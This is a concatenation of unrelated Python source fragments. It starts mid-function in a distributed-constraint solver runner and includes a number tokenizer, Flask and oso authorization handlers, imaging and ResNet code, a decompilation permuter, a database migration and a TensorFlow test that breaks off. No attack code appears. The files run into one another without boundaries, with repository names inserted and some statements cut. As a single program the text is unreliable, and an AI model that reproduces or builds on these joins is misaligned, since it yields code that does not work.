args.collect_on == "period": period = 1 if args.period is None else args.period else: if args.period is not None: _error('Cannot use "period" argument when collect_on is not ' '"period"') csv_cb = prepare_metrics_files(args.run_metrics, args.end_metrics, collect_on) _, algo_module, graph_module = _load_modules(None, args.algo) global dcop logger.info("loading dcop from {}".format(args.dcop_files)) dcop = load_dcop_from_file(args.dcop_files) dcop = filter_dcop(dcop) if args.distribution in DISTRIBUTION_METHODS: dist_module, algo_module, graph_module = _load_modules( args.distribution, args.algo ) else: dist_module, algo_module, graph_module = _load_modules(None, args.algo) logger.info("loading scenario from {}".format(args.scenario)) scenario = load_scenario_from_file(args.scenario) logger.info("Building computation graph ") cg = graph_module.build_computation_graph(dcop) logger.info("Distributing computation graph ") if dist_module is not None: distribution = dist_module.distribute( cg, dcop.agents.values(), hints=dcop.dist_hints, computation_memory=algo_module.computation_memory, communication_load=algo_module.communication_load, ) else: distribution = load_dist_from_file(args.distribution) logger.debug("Distribution Computation graph: %s ", distribution) algo = build_algo_def(algo_module, args.algo, dcop.objective, args.algo_params) # Setup metrics collection collector_queue = Queue() collect_t = Thread( target=collect_tread, args=[collector_queue, csv_cb], daemon=True ) collect_t.start() global orchestrator if args.mode == "thread": orchestrator = run_local_thread_dcop( algo, cg, distribution, dcop, INFINITY, collector=collector_queue, collect_moment=args.collect_on, period=period, replication=args.replication_method, ) elif args.mode == "process": # Disable logs from agents, they are in other processes anyway agt_logs = logging.getLogger("pydcop.agent") agt_logs.disabled = True # When using the (default) 'fork' start method, http servers on agent's # processes do not work (why ?) 
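# (A possible explanation, not from the original authors: 'fork' copies the
# parent's threads and socket state into each agent process, while 'spawn'
# starts each agent from a fresh interpreter, which would leave the per-agent
# HTTP servers in a usable state.)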
multiprocessing.set_start_method("spawn") orchestrator = run_local_process_dcop( algo, cg, distribution, dcop, INFINITY, collector=collector_queue, collect_moment=args.collect_on, period=period, ) orchestrator.set_error_handler(_orchestrator_error) try: orchestrator.deploy_computations() orchestrator.start_replication(args.ktarget) if orchestrator.wait_ready(): orchestrator.run(scenario, timeout=timeout) if timer: timer.cancel() if not timeout_stopped: if orchestrator.status == "TIMEOUT": dump_results(orchestrator, "TIMEOUT", output_file, run_metrics=run_metrics, end_metrics=end_metrics) sys.exit(0) elif orchestrator.status != "STOPPED": dump_results(orchestrator, "FINISHED", output_file, run_metrics=run_metrics, end_metrics=end_metrics) sys.exit(0) except Exception as e: logger.error("While handling timeout, recevied exception %s", e, exc_info=True) print(e) for th in threading.enumerate(): print(th) traceback.print_stack(sys._current_frames()[th.ident]) # noqa print() orchestrator.stop_agents(5) orchestrator.stop() dump_results(orchestrator, "ERROR", output_file, end_metrics=end_metrics, run_metrics=run_metrics) def _orchestrator_error(e): print("Error in orchestrator: \n ", e) sys.exit(2) def on_timeout(): if orchestrator is None: return # Timeout should have been handled by the orchestrator, if the cli timeout # has been reached, something is probably wrong : dump threads. for th in threading.enumerate(): print(th) traceback.print_stack(sys._current_frames()[th.ident]) print() if orchestrator is None: logger.debug("cli timeout with no orchestrator ?") return global timeout_stopped timeout_stopped = True # Stopping agents can be rather long, we need a big timeout ! orchestrator.stop_agents(20) orchestrator.stop() dump_results(orchestrator, "TIMEOUT", output_file, run_metrics=run_metrics, end_metrics=end_metrics) sys.exit(0) def on_force_exit(sig, frame): if orchestrator is None: return orchestrator.status = "STOPPED" orchestrator.stop_agents(5) orchestrator.stop() dump_results(orchestrator, "STOPPED", output_file, run_metrics=run_metrics, end_metrics=end_metrics) # for th in threading.enumerate(): # print(th) # traceback.print_stack(sys._current_frames()[th.ident]) # print() import re from enum import Enum from math import modf from dataclasses import dataclass FRACTION_MULT_DIV = 100.0 regex_any_digits = re.compile(r'\d', re.MULTILINE) regex_number = re.compile(r'^\$?\s*(\-?\(?[\d\,]*?\.?[\d]*\)?)\%?$', re.MULTILINE) YEARS_RANGE = range(1990, 2050) # These are the hard-coded numbers that are output for particular conditions. class Number(Enum): PADDING = 0 START_SEQUENCE = 10 END_SEQUENCE = 11 # This will be the starting key ('num_' + this value as a string) # for the number file. It will also be the starting key # (this value as a string) for the tokens file. 
START_WORD_NUM = 100 @dataclass(init=True, repr=False, eq=False, order=False, unsafe_hash=False, frozen=False) class NumberSequence: start: int negative: int number: int fraction: int percent: int end: int def __repr__(self): return '(' + str(self.start) + ',' \ + str(self.negative) + ',' \ + str(self.number) + ',' \ + str(self.fraction) + ',' \ + str(self.percent) + ',' \ + str(self.end) + ')' def __iter__(self): self.iter_values = [self.start, self.negative, self.number, self.fraction, self.percent, self.end] self.iter_cur = 0 return self def __next__(self): if self.iter_cur >= len(self.iter_values): raise StopIteration result = self.iter_values[self.iter_cur] self.iter_cur += 1 return result def __eq__(self, o): if isinstance(o, self.__class__): return hash(o) == hash(self) return NotImplemented def __hash__(self): # We know that tuples are hashable, so we store # our data in a tuple and hash it. return hash((self.start, self.negative, self.number, self.fraction, self.percent, self.end)) def convert_fraction_to_whole(num: str) -> str: # Check that if the number is a fraction, # we can multiply it by 100 and save just # the integer part without losing any data. # This is because fractions in accounting # data are probably percentages. # If not, raise an exception. num = abs(float(num)) frac, whole = modf(float(num) * FRACTION_MULT_DIV) # Since we're dealing with fractions, the math will not be perfect. # ex: number = 2.55, frac = 0.9999999 whole = 254.0 # In this case we have to add frac to whole. # Then when we truncate using int(), we will get the right value. whole = frac + whole return str(int(whole)) def convert_whole_to_fraction(num: int) -> float: return float(num / FRACTION_MULT_DIV) def number_to_sequence(is_negative, num_str, is_percent): # Many documents contain the % sign in a separate # cell from the actual value. We consider the presence # of the '.' in the text to denote percentage. if '.' in num_str: num_str = convert_fraction_to_whole(num_str) return NumberSequence( Number.START_SEQUENCE.value, 1 if is_negative else 0, int(num_str), 1, # this is a fractional number 1 if is_percent else 0, Number.END_SEQUENCE.value) else: return NumberSequence( Number.START_SEQUENCE.value, 1 if is_negative else 0, int(abs(int(num_str))), 0, # this is not a fractional number 1 if is_percent else 0, Number.END_SEQUENCE.value) def is_number(text): text = text.strip() text_len = len(text) if text_len == 1 and text == '-': return True if (text_len == 0) or \ (text_len == 1 and (text in list(r'.()${}[]":,'))): return False return bool(regex_number.fullmatch(text)) def digits_in_string(text): return bool(regex_any_digits.search(text)) def get_number(text): if not digits_in_string(text): return (False, False, False) match = regex_number.fullmatch(text) # If the whole match is not just a period, $, or comma, # then we have a valid number. if match is not None \ and match.group(0) not in ['.', '$', ',', '(', ')']: is_negative = is_percentage = False result = match.group(1) # Many documents contain the % sign in a separate # cell from the actual value. We consider the presence # of the '.' in the text to denote percentage. if '.' 
in text: is_percentage = True result = result.replace(',', '') \ .replace('$', '') \ .replace('%', '') if '(' in result or ')' in result: result = result.replace('(', '-') \ .replace(')', '') is_negative = True if len(result) == 0: return (False, False, False) return (is_negative, result, is_percentage) else: return (False, False, False) cwinpy/knope/__init__.py from .knope import knope, knope_dag 1-10 import argparse import logging from surrortg import Game from surrortg.inputs import Joystick class MyJoystick(Joystick): async def handle_coordinates(self, x, y, seat=0): logging.info(f"\tx:{x}, y:{y}") # handle player input here async def reset(self, seat=0): logging.info(f"reset") class DummyGame(Game): async def on_init(self): self.io.register_inputs({"joystick_main": MyJoystick()}) async def on_start(self): pass # add game logic here if __name__ == "__main__": parser = argparse.ArgumentParser("Dummy game") parser.add_argument( "-c", "--conf", metavar="", help="path to configuration .toml file", required=False, ) args = parser.parse_args() if args.conf is not None: DummyGame().run(config_path=args.conf) else: DummyGame().run() myarist/Codecademy dog_breeds_available_for_adoption = ["french_bulldog", "dalmatian", "shihtzu", "poodle", "collie"] dog_breed_I_want = "dalmatian" for dog_breed in dog_breeds_available_for_adoption: print(dog_breed) if dog_breed == dog_breed_I_want: print("They have the dog I want!") break from flask_restplus import Resource, Namespace from app.domain.errors import (IncorrectSign, IncorrectUsername, IncorrectPassword) from app.domain.usecases import auth_view_token, get_tip, auth_admin_token from .response_helper import Status, respond from .restful_helper import parse_argument api = Namespace('auth') @api.route('/tip') class Tip(Resource): def get(self): return respond({'tip': get_tip()}) @api.route('/admin') class AdminAuth(Resource): def post(self): args = parse_argument({'name': 'username', 'required': True}, {'name': 'password', 'required': True}) try: token = auth_admin_token(**args) except IncorrectUsername: return respond({'msg': 'Incorrect username!'}, Status.BAD_REQUEST) except IncorrectPassword: return respond({'msg': 'Incorrect password!'}, Status.BAD_REQUEST) else: return respond(({'token': token})) @api.route('/view') class ViewAuth(Resource): def post(self): args = parse_argument({'name': 'sign', 'required': True}) try: token = auth_view_token(**args) except IncorrectSign: return respond({'msg': 'Incorrect sign!'}, Status.BAD_REQUEST) else: return respond({'token': token}) 0 from http.server import HTTPServer, BaseHTTPRequestHandler from oso import Oso from expense import Expense, EXPENSES oso = Oso() oso.load_file("expenses.polar") class RequestHandler(BaseHTTPRequestHandler): def _respond(self, msg, code=200): self.send_response(code) self.end_headers() self.wfile.write(str(msg).encode()) self.wfile.write(b"\n") def do_GET(self): actor = self.headers.get("user", None) action = "GET" try: _, resource_type, resource_id = self.path.split("/") if resource_type != "expenses": return self._respond("Not Found!", 404) resource = EXPENSES[int(resource_id)] if oso.is_allowed(actor, action, resource): self._respond(resource) else: self._respond("Not Authorized!", 403) except (KeyError, ValueError) as e: self._respond("Not Found!", 404) server_address = ("", 5050) httpd = HTTPServer(server_address, RequestHandler) if __name__ == "__main__": print("running on port", httpd.server_port) httpd.serve_forever() tests/test_video_conferences.py def 
test_update_jitsi_timeout(logged_rocket): update_jitsi_timeout = logged_rocket.update_jitsi_timeout(room_id="GENERAL").json() assert update_jitsi_timeout.get("success") from kdfs.argon2kdf import Argon2Kdf import unittest class TestArgon2Kdf(unittest.TestCase): def test_serialize_deserialize(self): tmp = Argon2Kdf.sensitive() tmp.salt = bytes(range(32)) tmp2 = tmp.serialize() tmp3 = Argon2Kdf.deserialize(tmp2) self.assertEqual(tmp.salt, tmp3.salt) self.assertEqual(tmp.version, tmp3.version) self.assertEqual(tmp.type, tmp3.type) self.assertEqual(tmp.time_cost, tmp3.time_cost) self.assertEqual(tmp.memory_cost, tmp3.memory_cost) self.assertEqual(tmp.type, tmp3.type) self.assertEqual(tmp.version, tmp3.version) def test_derive(self): tmp = Argon2Kdf.sensitive() tmp.salt = bytes(range(32)) res = tmp.derive("abrakadabra", 24) self.assertEqual(len(res), 24) import os import imageio import cv2 import matplotlib.pyplot as plt import numpy as np VIDEO_TYPES = ['.avi', '.mp4', ] IMAGE_TYPES = ['.png', '.bmp', '.tiff', '.jpg', '.jpeg'] class OCTVolumeWithMetaData(object): """ Class to hold the OCT volume and any related metadata, and enable viewing and saving. Attributes: volume (list of np.array): All the volume's b-scans. laterality (str): Left or right eye. patient_id (str): Patient ID. DOB (str): Patient date of birth. num_slices: Number of b-scans present in volume. """ def __init__(self, volume, laterality=None, patient_id=None, patient_dob=None): self.volume = volume self.laterality = laterality self.patient_id = patient_id self.DOB = patient_dob self.num_slices = len(self.volume) def peek(self, rows=5, cols=5, filepath=None): """ Plots a montage of the OCT volume. Optionally saves the plot if a filepath is provided. Args: rows (int) : Number of rows in the plot. cols (int) : Number of columns in the plot. filepath (str): Location to save montage to. """ images = rows * cols x_size = rows * self.volume[0].shape[0] y_size = cols * self.volume[0].shape[1] ratio = y_size / x_size slices_indices = np.linspace(0, self.num_slices - 1, images).astype(np.int) plt.figure(figsize=(12*ratio,12)) for i in range(images): plt.subplot(rows, cols, i +1) plt.imshow(self.volume[slices_indices[i]],cmap='gray') plt.axis('off') plt.title('{}'.format(slices_indices[i])) plt.suptitle('OCT volume with {} slices.'.format(self.num_slices)) if filepath is not None: plt.savefig(filepath) else: plt.show() def save(self, filepath): """Saves OCT volume as a video or stack of slices. Args: filepath (str): Location to save volume to. Extension must be in VIDEO_TYPES or IMAGE_TYPES. 
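A '.npy' extension is also accepted; in that case the raw volume array is saved with np.save.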
""" extension = os.path.splitext(filepath)[1] if extension.lower() in VIDEO_TYPES: video_writer = imageio.get_writer(filepath, macro_block_size=None) for slice in self.volume: video_writer.append_data(slice) video_writer.close() elif extension.lower() in IMAGE_TYPES: base = os.path.splitext(os.path.basename(filepath))[0] print('Saving OCT as sequential slices {}_[1..{}]{}'.format(base, len(self.volume), extension)) full_base = os.path.splitext(filepath)[0] for index, slice in enumerate(self.volume): filename = '{}_{}{}'.format(full_base, index, extension) cv2.imwrite(filename, slice) elif extension.lower() == '.npy': np.save(filepath, self.volume) else: raise NotImplementedError('Saving with file extension {} not supported'.format(extension)) # Tensorflow v.2.3.1 """ Programmed by the-robot """ from tensorflow.keras.layers import ( Activation, Add, BatchNormalization, Conv2D, ) import tensorflow as tf import typing @tf.function def block( X: tf.Tensor, kernel_size: int, filters: typing.List[int], stage_no: int, block_name: str, is_conv_layer: bool = False, stride: int = 2 ) -> tf.Tensor: """ Block for residual network. Arguments: X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev) kernel_size -- integer, specifying the shape of the middle CONV's window for the main path filters -- python list of integers, defining the number of filters in the CONV layers of the main path stage_no -- integer, used to name the layers, depending on their position in the network block_name -- string/character, used to name the layers, depending on their position in the network is_conv_layer -- to identiy if identity downsample is needed stride -- integer specifying the stride to be used Returns: X -- output of the identity block, tensor of shape (n_H, n_W, n_C) """ # names conv_name_base = "res" + str(stage_no) + block_name + "_branch" bn_name_base = "bn" + str(stage_no) + block_name + "_branch" # filters F1, F2, F3 = filters # save the input value for shortcut. 
X_shortcut = X # First component # NOTE: if conv_layer, you need to do downsampling X = Conv2D( filters = F1, kernel_size = (1, 1), strides = (stride, stride) if is_conv_layer else (1, 1), padding = "valid", name = conv_name_base + "2a", kernel_initializer = "glorot_uniform", )(X) X = BatchNormalization(axis = 3, name = bn_name_base + "2a")(X) X = Activation("relu")(X) # Second component X = Conv2D( filters = F2, kernel_size = (kernel_size, kernel_size), strides = (1, 1), padding = "same", name = conv_name_base + "2b", kernel_initializer = "glorot_uniform", )(X) X = BatchNormalization(axis = 3, name = bn_name_base + "2b")(X) X = Activation("relu")(X) # Third component X = Conv2D( filters = F3, kernel_size = (1, 1), strides = (1, 1), padding = "valid", name = conv_name_base + "2c", kernel_initializer = "glorot_uniform", )(X) X = BatchNormalization(axis = 3, name = bn_name_base + "2c")(X) # NOTE: if is_conv_layer, you need to do downsampling the X_shortcut to match the output (X) channel # so it can be added together if is_conv_layer: X_shortcut = Conv2D( filters = F3, kernel_size = (1, 1), strides = (stride, stride), padding = "valid", name = conv_name_base + "1", kernel_initializer = "glorot_uniform", )(X_shortcut) X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + "1")(X_shortcut) # Shortcut value X = Add()([X, X_shortcut]) X = Activation("relu")(X) return Xsrc/permuter.py from dataclasses import dataclass import difflib import itertools import random import re import time import traceback from typing import ( Any, List, Iterator, Optional, Tuple, Union, ) from .candidate import Candidate, CandidateResult from .compiler import Compiler from .error import CandidateConstructionFailure from .perm.perm import EvalState from .perm.eval import perm_evaluate_one, perm_gen_all_seeds from .perm.parse import perm_parse from .profiler import Profiler from .scorer import Scorer @dataclass class EvalError: exc_str: Optional[str] seed: Optional[Tuple[int, int]] EvalResult = Union[CandidateResult, EvalError] @dataclass class Finished: reason: Optional[str] = None @dataclass class Message: text: str class NeedMoreWork: pass class _CompileFailure(Exception): pass @dataclass class WorkDone: perm_index: int result: EvalResult Task = Union[Finished, Tuple[int, int]] FeedbackItem = Union[Finished, Message, NeedMoreWork, WorkDone] Feedback = Tuple[FeedbackItem, int, Optional[str]] class Permuter: """ Represents a single source from which permutation candidates can be generated, and which keeps track of good scores achieved so far. """ def __init__( self, dir: str, fn_name: Optional[str], compiler: Compiler, scorer: Scorer, source_file: str, source: str, *, force_seed: Optional[int], force_rng_seed: Optional[int], keep_prob: float, need_profiler: bool, need_all_sources: bool, show_errors: bool, best_only: bool, better_only: bool, ) -> None: self.dir = dir self.compiler = compiler self.scorer = scorer self.source_file = source_file self.source = source if fn_name is None: # Semi-legacy codepath; all functions imported through import.py have a # function name. This would ideally be done on AST level instead of on the # pre-macro'ed source code, but we don't care enough to make that # refactoring. fns = _find_fns(source) if len(fns) == 0: raise Exception(f"{self.source_file} does not contain any function!") if len(fns) > 1: raise Exception( f"{self.source_file} must contain only one function, " "or have a function.txt next to it with a function name." 
) self.fn_name = fns[0] else: self.fn_name = fn_name self.unique_name = self.fn_name self._permutations = perm_parse(source) self._force_seed = force_seed self._force_rng_seed = force_rng_seed self._cur_seed: Optional[Tuple[int, int]] = None self.keep_prob = keep_prob self.need_profiler = need_profiler self._need_all_sources = need_all_sources self._show_errors = show_errors self._best_only = best_only self._better_only = better_only ( self.base_score, self.base_hash, self.base_source, ) = self._create_and_score_base() self.best_score = self.base_score self.hashes = {self.base_hash} self._cur_cand: Optional[Candidate] = None self._last_score: Optional[int] = None def _create_and_score_base(self) -> Tuple[int, str, str]: base_source, eval_state = perm_evaluate_one(self._permutations) base_cand = Candidate.from_source( base_source, eval_state, self.fn_name, rng_seed=0 ) o_file = base_cand.compile(self.compiler, show_errors=True) if not o_file: raise CandidateConstructionFailure(f"Unable to compile {self.source_file}") base_result = base_cand.score(self.scorer, o_file) assert base_result.hash is not None return base_result.score, base_result.hash, base_cand.get_source() def _need_to_send_source(self, result: CandidateResult) -> bool: return self._need_all_sources or self.should_output(result) def _eval_candidate(self, seed: int) -> CandidateResult: t0 = time.time() # Determine if we should keep the last candidate. # Don't keep 0-score candidates; we'll only create new, worse, zeroes. keep = ( self._permutations.is_random() and random.uniform(0, 1) < self.keep_prob and self._last_score != 0 and self._last_score != self.scorer.PENALTY_INF ) or self._force_rng_seed self._last_score = None # Create a new candidate if we didn't keep the last one (or if the last one didn't exist) # N.B. if we decide to keep the previous candidate, we will skip over the provided seed. # This means we're not guaranteed to test all seeds, but it doesn't really matter since # we're randomizing anyway. if not self._cur_cand or not keep: eval_state = EvalState() cand_c = self._permutations.evaluate(seed, eval_state) rng_seed = self._force_rng_seed or random.randrange(1, 10 ** 20) self._cur_seed = (seed, rng_seed) self._cur_cand = Candidate.from_source( cand_c, eval_state, self.fn_name, rng_seed=rng_seed ) # Randomize the candidate if self._permutations.is_random(): self._cur_cand.randomize_ast() t1 = time.time() self._cur_cand.get_source() t2 = time.time() o_file = self._cur_cand.compile(self.compiler) if not o_file and self._show_errors: raise _CompileFailure() t3 = time.time() result = self._cur_cand.score(self.scorer, o_file) t4 = time.time() if self.need_profiler: profiler = Profiler() profiler.add_stat(Profiler.StatType.perm, t1 - t0) profiler.add_stat(Profiler.StatType.stringify, t2 - t1) profiler.add_stat(Profiler.StatType.compile, t3 - t2) profiler.add_stat(Profiler.StatType.score, t4 - t3) result.profiler = profiler self._last_score = result.score if not self._need_to_send_source(result): result.source = None result.hash = None return result def should_output(self, result: CandidateResult) -> bool: """Check whether a result should be outputted. 
This must be more liberal in child processes than in parent ones, or else sources will be missing.""" return ( result.score <= self.base_score and result.hash is not None and result.source is not None and not (result.score > self.best_score and self._best_only) and ( result.score < self.base_score or (result.score == self.base_score and not self._better_only) ) and result.hash not in self.hashes ) def record_result(self, result: CandidateResult) -> None: """Record a new result, updating the best score and adding the hash to the set of hashes we have already seen. No hash is recorded for score 0, since we are interested in all score 0's, not just the first.""" self.best_score = min(self.best_score, result.score) if result.score != 0 and result.hash is not None: self.hashes.add(result.hash) def seed_iterator(self) -> Iterator[int]: """Create an iterator over all seeds for this permuter. The iterator will be infinite if we are randomizing.""" if self._force_seed is None: return iter(perm_gen_all_seeds(self._permutations)) if self._permutations.is_random(): return itertools.repeat(self._force_seed) return iter([self._force_seed]) def try_eval_candidate(self, seed: int) -> EvalResult: """Evaluate a seed for the permuter.""" try: return self._eval_candidate(seed) except _CompileFailure: return EvalError(exc_str=None, seed=self._cur_seed) except Exception: return EvalError(exc_str=traceback.format_exc(), seed=self._cur_seed) def diff(self, other_source: str) -> str: """Compute a unified white-space-ignoring diff from the (pretty-printed) base source against another source generated from this permuter.""" class Line(str): def __eq__(self, other: Any) -> bool: return isinstance(other, str) and self.strip() == other.strip() def __hash__(self) -> int: return hash(self.strip()) a = list(map(Line, self.base_source.split("\n"))) b = list(map(Line, other_source.split("\n"))) return "\n".join( difflib.unified_diff(a, b, fromfile="before", tofile="after", lineterm="") ) def _find_fns(source: str) -> List[str]: fns = re.findall(r"(\w+)\([^()\n]*\)\s*?{", source) return [ fn for fn in fns if not fn.startswith("PERM") and fn not in ["if", "for", "switch", "while"] ] jf20541/PairsTrading import matplotlib.pyplot as plt import config import pandas as pd def plot_pr(): price_ratio = df["ETH"] / df["BTC"] price_ratio.plot(figsize=(15, 8)) plt.axhline(price_ratio.mean(), color="red") plt.title("ETH/BTC Price Ratio") plt.ylabel("Price-Ratio") plt.xlabel("Days") plt.legend(["ETH/BTC Price-Ratio", "Average Price-Ratio"]) # plt.savefig("../plots/CoinPR.jpg") plt.show() print(f"Average Price-Ratio: {price_ratio.mean():.4f}") if __name__ == "__main__": df = pd.read_csv(config.TRAINING_FILE) plot_pr() """add notes table Revision ID: f126b53d70f5 Revises: Create Date: 2021-06-20 05:13:31.216501 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '' down_revision = '' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! 
### op.create_table('notes', sa.Column('id', sa.Integer(), nullable=False), sa.Column('title', sa.String(), nullable=True), sa.Column('description', sa.String(), nullable=True), sa.Column('owner_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_notes_id'), 'notes', ['id'], unique=False) op.create_index(op.f('ix_notes_title'), 'notes', ['title'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_notes_title'), table_name='notes') op.drop_index(op.f('ix_notes_id'), table_name='notes') op.drop_table('notes') # ### end Alembic commands ### kkew3/sat-minesweeper import operator as op from functools import reduce, partial import itertools import json def ncr(n, r): r = min(r, n - r) numer = reduce(op.mul, range(n, n - r, -1), 1) denom = reduce(op.mul, range(1, r + 1), 1) return numer // denom def dnf(n, k): clauses = [list(range(1, n + 1)) for _ in range(ncr(n, k))] for i, to_negate in enumerate(itertools.combinations(range(n), n - k)): for j in to_negate: clauses[i][j] = -clauses[i][j] return clauses def dnf2cnf(dclauses): cclauses = set() for cc in map(frozenset, itertools.product(*dclauses)): for e in cclauses: if e <= cc: break else: l = [0 for _ in range(10)] for x in cc: if l[abs(x)] + x == 0: break l[abs(x)] = x else: cclauses.add(cc) continue return list(map(partial(sorted, key=abs), cclauses)) def main(): result = [] for n in range(1, 9): for k in range(0, n + 1): if n >= 6 and k not in (0, 1, n - 1, n): continue result.append([[n, k], dnf2cnf(dnf(n, k))]) with open('data/sattable.json', 'w') as outfile: json.dump(result, outfile) if __name__ == '__main__': main() adamjmcgrath/glancydesign from django.dispatch import Signal request_started = Signal() request_finished = Signal() got_request_exception = Signal(providing_args=["request"]) # convertImageGrayscale.py # A program that converts a user supplied image to grayscale. """Write a program that converts a color image to grayscale. The user supplies the name of a file containing a GIF or PPM image, and the program loads the image and displays the file. At the click of a mouse, the program converts the image to grayscale. The user is then prompted for a file name to store the grayscale image in. You will probably want to go back and review the Image object from the graphics library (Section 4.8.4). The basic idea of converting the image is to go through it pixel by pixel and convert each one from color to an appropriate shade of gray. A gray pixel is created by setting its red, green, and blue components to have the same brightness. So color_rgb(0, 0, 0) is black, color_rgb(255, 255, 255) is white, and color_rgb(127, 127, 127) is gray "halfway" between. You should use a weighted average of the original RGB values to determine the brightness of the gray. Here is the pseudocode for the grayscale algorithm: for each row in the image: for each column in the image: r, g, b = get pixel information for the current row and column brightness = int(round(0.299r + 0.587g + 0.114b)) set pixel color to color_rgb(brightness, brightness, brightness) update the image # to see progress row by row Note: The pixel operations in the Image class are rather slow, so you will want to use relatively small images (not 12 megapixels) to test your program.""" from graphics import * def getPicture(): # Create a graphic window to get the file name. 
win = GraphWin("Input File Name", 400, 400) win.setBackground("white") win.setCoords(0.0, 0.0, 4.0, 4.0) # Introduction message = Text(Point(2.0, 3.5), \ """This program gets a color image and converts it to grayscale.""").draw(win) Text(Point(0.75, 3), "Input file name: ").draw(win) infileEntry = Entry(Point(2.25, 3), 20) infileEntry.draw(win) button = Text(Point(2, 1.5), "Get the file") button.draw(win) Rectangle(Point(1, 1.0), Point(3, 2)).draw(win) # Initialize p to immediately execute the while loop p = Point(0, 0) infileEntry.setText("") while not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): p = win.getMouse() # Do nothing if the click is not in the "Get file" button if not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): pass else: try: infileName = infileEntry.getText() # Files have a period before the file type if infileName == "" or not("." in infileName): # Reset p to keep the window open. p = Point(0, 0) message.setText("You have to enter a valid file name.") infileEntry.setText("") continue except (SyntaxError, NameError, TypeError, ValueError): message.setText("You have to enter a valid file name.") infileEntry.setText("") # You don't want the window closing inadvertently, so reset p. p = Point(0, 0) continue win.close() return infileName def showPhoto(infileName): photo = Image(Point(0,0), infileName) w = photo.getWidth() h = photo.getHeight() photo.move(w/2, h/2) win = GraphWin("Grayscale Converter", w, h) photo.draw(win) message = Text(Point(w/2, h/3), """Click to start grayscale conversion.""") message.setSize(36) message.setTextColor("Orange") message.draw(win) win.getMouse() message.undraw() grayscaleConverter(photo, win) return photo, win def grayscaleConverter(photo, win): w = photo.getWidth() h = photo.getHeight() for row in range(0, h): for col in range(0, w): r, g, b = photo.getPixel(col, row) brightness = int(round(0.299*r + 0.587*g + 0.114*b)) photo.setPixel(col, row, \ color_rgb(brightness, brightness, brightness)) # Update each row to show progress win.update() def savePhoto(photo): # Create a graphic window to allow the user to save the photo. win = GraphWin("Save Photo", 400, 400) win.setBackground("white") win.setCoords(0.0, 0.0, 4.0, 4.0) # Introduction message = Text(Point(2.0, 3.5), \ """Do you want to save your photo? """).draw(win) Text(Point(0.75, 3), "Save file as: ").draw(win) saveFileEntry = Entry(Point(2.25, 3), 20) saveFileEntry.draw(win) button = Text(Point(2, 1.5), "Save the file") button.draw(win) Rectangle(Point(1, 1.0), Point(3, 2)).draw(win) # Initialize p to immediately execute the while loop p = Point(0, 0) saveFileEntry.setText("") while not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): p = win.getMouse() # Do nothing if the click is not in the "Save file" button if not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): pass else: try: saveFileName = saveFileEntry.getText() # Files have a period before the file type if saveFileName == "" or not("." in saveFileName): # Reset p to keep the window open. p = Point(0, 0) message.setText("You have to enter a valid file name.") saveFileEntry.setText("") continue except (SyntaxError, NameError, TypeError, ValueError): message.setText("You have to enter a valid file name.") saveFileEntry.setText("") # You don't want the window closing inadvertently, so reset p. 
p = Point(0, 0) continue photo.save(saveFileName) win.close() def main(): # Get the input file from the user infileName = getPicture() # Display the file and convert the image to grayscale photo, win = showPhoto(infileName) # Open a new window to let the user save the photo savePhoto(photo) # Let the user admire the newly saved photo main()# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for the experimental input pipeline ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import threading from absl.testing import parameterized import numpy as np from tensorflow.core.protobuf import config_pb2 from tensorflow.python.data.kernel_tests import test_base from tensorflow.python.data.ops import dataset_ops from tensorflow.python.framework import errors from tensorflow.python.framework import sparse_tensor from tensorflow.python.ops import array_ops from tensorflow.python.ops import script_ops from tensorflow.python.ops import sparse_ops from tensorflow.python.platform import test def _interleave(lists, cycle_length, block_length): """Reference implementation of interleave used for testing. Args: lists: a list of lists to interleave cycle_length: the length of the interleave cycle block_length: the length of the interleave block Yields: Elements of `lists` interleaved in the order determined by `cycle_length` and `block_length`. """ num_open = 0 # `all_iterators` acts as a queue of iterators over each element of `lists`. all_iterators = [iter(l) for l in lists] # `open_iterators` are the iterators whose elements are currently being # interleaved. open_iterators = [] for i in range(cycle_length): if all_iterators: open_iterators.append(all_iterators.pop(0)) num_open += 1 else: open_iterators.append(None) while num_open or all_iterators: for i in range(cycle_length): if open_iterators[i] is None: if all_iterators: open_iterators[i] = all_iterators.pop(0) num_open += 1 else: continue for _ in range(block_length): try: yield next(open_iterators[i]) except StopIteration: open_iterators[i] = None num_open -= 1 break def _make_coordinated_sloppy_dataset(input_values, cycle_length, block_length, num_parallel_calls): """Produces a dataset iterator and events to control the order of elements. Args: input_values: the values to generate lists to interleave from cycle_length: the length of the interleave cycle block_length: the length of the interleave block num_parallel_calls: the degree of interleave parallelism Returns: A dataset iterator (represented as `get_next` op) and events that can be used to control the order of output elements. """ # Set up threading events used to sequence when items are produced that # are subsequently interleaved. These events allow us to deterministically # simulate slowdowns and force sloppiness. 
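# Illustrative note (a worked trace, not from the original test file): for the
# reference implementation _interleave above, assuming lists = [[1, 1], [2], [3, 3, 3]],
# cycle_length = 2 and block_length = 1, the generator opens the first two lists,
# alternates one element at a time, and pulls in the third list once a cycle slot
# becomes free:
#     list(_interleave([[1, 1], [2], [3, 3, 3]], 2, 1)) == [1, 2, 1, 3, 3, 3]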
